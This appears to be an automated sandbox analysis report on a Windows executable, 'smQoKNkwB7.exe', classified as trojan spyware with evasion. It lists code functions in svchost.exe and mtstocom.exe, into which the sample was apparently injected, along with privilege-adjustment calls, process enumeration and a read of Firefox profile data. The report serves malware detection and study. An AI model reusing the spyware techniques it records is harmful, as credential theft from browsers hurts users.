Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E1D3	2_2_0040E1D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004029F0	2_2_004029F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004101F3	2_2_004101F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416A4E	2_2_00416A4E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416A53	2_2_00416A53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E318	2_2_0040E318
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E323	2_2_0040E323
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403330	2_2_00403330
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004026C0	2_2_004026C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FFD3	2_2_0040FFD3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042EF93	2_2_0042EF93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FA352	2_2_035FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036003E6	2_2_036003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C02C0	2_2_035C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C8158	2_2_035C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530100	2_2_03530100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F81CC	2_2_035F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036001AA	2_2_036001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F41A2	2_2_035F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D2000	2_2_035D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03564750	2_2_03564750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540770	2_2_03540770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353C7C0	2_2_0353C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355C6E0	2_2_0355C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540535	2_2_03540535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03600591	2_2_03600591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F2446	2_2_035F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E4420	2_2_035E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EE4F6	2_2_035EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FAB40	2_2_035FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F6BD7	2_2_035F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353EA80	2_2_0353EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03556962	2_2_03556962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360A9A6	2_2_0360A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035429A0	2_2_035429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354A840	2_2_0354A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03542840	2_2_03542840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E8F0	2_2_0356E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035268B8	2_2_035268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B4F40	2_2_035B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560F30	2_2_03560F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E2F30	2_2_035E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03582F28	2_2_03582F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03532FC8	2_2_03532FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354CFE0	2_2_0354CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035BEFA0	2_2_035BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540E59	2_2_03540E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FEE26	2_2_035FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FEEDB	2_2_035FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03552E90	2_2_03552E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FCE93	2_2_035FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DCD1F	2_2_035DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354AD00	2_2_0354AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353ADE0	2_2_0353ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03558DBF	2_2_03558DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03540C00	2_2_03540C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03530CF2	2_2_03530CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0CB5	2_2_035E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352D34C	2_2_0352D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F132D	2_2_035F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0358739A	2_2_0358739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355B2C0	2_2_0355B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E12ED	2_2_035E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035452A0	2_2_035452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360B16B	2_2_0360B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352F172	2_2_0352F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357516C	2_2_0357516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354B1B0	2_2_0354B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EF0CC	2_2_035EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035470C0	2_2_035470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F70E9	2_2_035F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FF0E0	2_2_035FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FF7B0	2_2_035FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03585630	2_2_03585630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F16CC	2_2_035F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F7571	2_2_035F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036095C3	2_2_036095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DD5B0	2_2_035DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03531460	2_2_03531460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FF43F	2_2_035FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFB76	2_2_035FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B5BF0	2_2_035B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0357DBF9	2_2_0357DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355FB80	2_2_0355FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFA49	2_2_035FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F7A46	2_2_035F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B3A6C	2_2_035B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EDAC6	2_2_035EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DDAAC	2_2_035DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03585AA0	2_2_03585AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E1AA3	2_2_035E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03549950	2_2_03549950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355B950	2_2_0355B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D5910	2_2_035D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AD800	2_2_035AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035438E0	2_2_035438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFF09	2_2_035FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03503FD2	2_2_03503FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03503FD5	2_2_03503FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03541F92	2_2_03541F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFFB1	2_2_035FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03549EB0	2_2_03549EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F1D5A	2_2_035F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03543D40	2_2_03543D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F7D73	2_2_035F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355FDC0	2_2_0355FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B9C32	2_2_035B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FFCF2	2_2_035FFCF2
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057BFA19	7_2_057BFA19
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057C1872	7_2_057C1872
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057E0832	7_2_057E0832
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057CA0F2	7_2_057CA0F2
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057BFBC2	7_2_057BFBC2
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057BFBB7	7_2_057BFBB7
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057BFA72	7_2_057BFA72
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057C82F2	7_2_057C82F2
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057C82ED	7_2_057C82ED
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_057C1A92	7_2_057C1A92
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_095F3B5D	7_2_095F3B5D
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_095E836D	7_2_095E836D
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_09612B1D	7_2_09612B1D
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_095FC3DD	7_2_095FC3DD
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_095F1D5D	7_2_095F1D5D
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_095F3D7D	7_2_095F3D7D
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_095F8D2D	7_2_095F8D2D
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_095FA5DD	7_2_095FA5DD
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_095FA5D8	7_2_095FA5D8
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_095F1EAD	7_2_095F1EAD
Source: C:\Program Files (x86)\FkusXnfDBQPgEAilGCZAznQIWjjwEfIrQezKSQZbjqoifnagPhk\wjIagcdbKdk.exe	Code function: 7_2_095F1EA2	7_2_095F1EA2
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052A0535	8_2_052A0535
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05360591	8_2_05360591
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05344420	8_2_05344420
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05352446	8_2_05352446
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0534E4F6	8_2_0534E4F6
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052A0770	8_2_052A0770
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052C4750	8_2_052C4750
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0529C7C0	8_2_0529C7C0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052BC6E0	8_2_052BC6E0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05290100	8_2_05290100
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0533A118	8_2_0533A118
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05328158	8_2_05328158
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_053541A2	8_2_053541A2
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_053601AA	8_2_053601AA
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_053581CC	8_2_053581CC
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05332000	8_2_05332000
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0535A352	8_2_0535A352
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_053603E6	8_2_053603E6
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052AE3F0	8_2_052AE3F0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05340274	8_2_05340274
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_053202C0	8_2_053202C0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052AAD00	8_2_052AAD00
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0533CD1F	8_2_0533CD1F
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052B8DBF	8_2_052B8DBF
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0529ADE0	8_2_0529ADE0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052A0C00	8_2_052A0C00
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05340CB5	8_2_05340CB5
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05290CF2	8_2_05290CF2
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05342F30	8_2_05342F30
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052E2F28	8_2_052E2F28
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052C0F30	8_2_052C0F30
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05314F40	8_2_05314F40
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0531EFA0	8_2_0531EFA0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052ACFE0	8_2_052ACFE0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05292FC8	8_2_05292FC8
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0535EE26	8_2_0535EE26
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052A0E59	8_2_052A0E59
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0535CE93	8_2_0535CE93
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052B2E90	8_2_052B2E90
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0535EEDB	8_2_0535EEDB
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052B6962	8_2_052B6962
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052A29A0	8_2_052A29A0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0536A9A6	8_2_0536A9A6
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052A2840	8_2_052A2840
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052AA840	8_2_052AA840
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052868B8	8_2_052868B8
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052CE8F0	8_2_052CE8F0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0535AB40	8_2_0535AB40
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05356BD7	8_2_05356BD7
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0529EA80	8_2_0529EA80
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05357571	8_2_05357571
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0533D5B0	8_2_0533D5B0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0535F43F	8_2_0535F43F
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05291460	8_2_05291460
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0535F7B0	8_2_0535F7B0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052E5630	8_2_052E5630
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_053516CC	8_2_053516CC
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052D516C	8_2_052D516C
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0528F172	8_2_0528F172
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0536B16B	8_2_0536B16B
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052AB1B0	8_2_052AB1B0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0535F0E0	8_2_0535F0E0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_053570E9	8_2_053570E9
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052A70C0	8_2_052A70C0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0534F0CC	8_2_0534F0CC
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0535132D	8_2_0535132D
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0528D34C	8_2_0528D34C
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052E739A	8_2_052E739A
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052A52A0	8_2_052A52A0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_053412ED	8_2_053412ED
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052BB2C0	8_2_052BB2C0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05357D73	8_2_05357D73
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052A3D40	8_2_052A3D40
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05351D5A	8_2_05351D5A
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052BFDC0	8_2_052BFDC0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05319C32	8_2_05319C32
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0535FCF2	8_2_0535FCF2
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0535FF09	8_2_0535FF09
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0535FFB1	8_2_0535FFB1
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052A1F92	8_2_052A1F92
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052A9EB0	8_2_052A9EB0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05335910	8_2_05335910
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052A9950	8_2_052A9950
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052BB950	8_2_052BB950
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0530D800	8_2_0530D800
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052A38E0	8_2_052A38E0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0535FB76	8_2_0535FB76
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052BFB80	8_2_052BFB80
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05315BF0	8_2_05315BF0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052DDBF9	8_2_052DDBF9
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05313A6C	8_2_05313A6C
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05357A46	8_2_05357A46
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0535FA49	8_2_0535FA49
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_052E5AA0	8_2_052E5AA0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_05341AA3	8_2_05341AA3
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0533DAAC	8_2_0533DAAC
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_0534DAC6	8_2_0534DAC6
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032E1BD0	8_2_032E1BD0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032DCA00	8_2_032DCA00
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032DAD45	8_2_032DAD45
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032DAD50	8_2_032DAD50
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032DCC20	8_2_032DCC20
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032DAC00	8_2_032DAC00
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032E5280	8_2_032E5280
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032E347B	8_2_032E347B
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032E3480	8_2_032E3480
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_032FB9C0	8_2_032FB9C0
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_050FD738	8_2_050FD738
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_050FE66C	8_2_050FE66C
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_050FE1B8	8_2_050FE1B8
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: 8_2_050FE2D4	8_2_050FE2D4

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: String function: 00200A30 appears 46 times
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: String function: 001FF9F2 appears 40 times
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: String function: 001E9CB3 appears 31 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 035AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03587E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0352B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03575130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 035BF290 appears 105 times
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: String function: 052E7E54 appears 105 times
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: String function: 0530EA12 appears 86 times
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: String function: 052D5130 appears 58 times
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: String function: 0528B970 appears 280 times
Source: C:\Windows\SysWOW64\mtstocom.exe	Code function: String function: 0531F290 appears 105 times

Source: smQoKNkwB7.exe, 00000000.00000003.2340640791.0000000003633000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs smQoKNkwB7.exe
Source: smQoKNkwB7.exe, 00000000.00000003.2344192857.000000000382D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs smQoKNkwB7.exe

Source: smQoKNkwB7.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@4/4

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_002537B5 GetLastError,FormatMessageW,

0_2_002537B5

Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_002410BF AdjustTokenPrivileges,CloseHandle,		0_2_002410BF
Source: C:\Users\user\Desktop\smQoKNkwB7.exe	Code function: 0_2_002416C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_002416C3

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_002551CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_002551CD

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_0026A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0026A67C

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_0025648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0025648E

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Code function: 0_2_001E42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_001E42A2

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

File created: C:\Users\user\AppData\Local\Temp\aut4A8A.tmp

Jump to behavior

Source: smQoKNkwB7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\smQoKNkwB7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

